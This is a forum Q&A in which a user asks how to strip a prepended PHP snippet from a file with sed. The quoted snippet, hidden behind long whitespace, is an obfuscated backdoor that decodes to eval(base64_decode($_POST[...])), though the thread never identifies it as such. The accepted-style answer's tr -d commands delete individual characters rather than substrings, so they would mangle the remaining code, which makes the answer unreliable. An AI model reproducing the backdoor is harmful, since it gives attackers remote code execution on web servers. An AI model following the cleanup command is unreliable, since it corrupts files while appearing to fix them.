# Remove substring with sed

Tags: regex, linux, bash, unix, sed

I try to use a Bash script to read the content from a file.
The file contains following data:

```
   <?php                                                                                                                                                                                                                                                               $sF="PCT4BA
6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nf14f8b'])) {eval($s21(${$s20}['nf14f8b']));}?><?php
......<MORE CODE>....
?>
```

My goal is to get the "MORE CODE" by shell command 'sed'. But i have no success. Can you please help me? Thanks in advance!

Cheers,
Boris

Comment: Could you make your question understandable?

Comment: Trying to parse PHP using sed isn't a good idea.

Answer (score 0):

My suggestion would be to skip sed and just use grep.  If I understand this correctly, your input looks something like this:

`PHPFileInput:`

```
<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['nf14f8b'])) {eval($s21(${$s20}['nf14f8b']));}?>

<?php ...<MORE CODE>...  ?>
```

If your input resembles this, you can simple use grep -v to grab everything that does not match "some string", however it only works on a per line basis.  If your php is fragmented on multiple lines, you'll need a string to remove those lines using grep.  Example:

From the above PHP input:

```
$ cat PHPFileInput | grep -v "PCT4BA6ODSE_" | tr -d "<?php?" | tr -d "?>"
```

which will return

```
 ...MORE CODE...
```

I picked `PCT4BA6ODSE_` because it looks pretty unique, but its up to you to pick strings that will work for you.

Note: You can pipe a grep -v into another grep -v.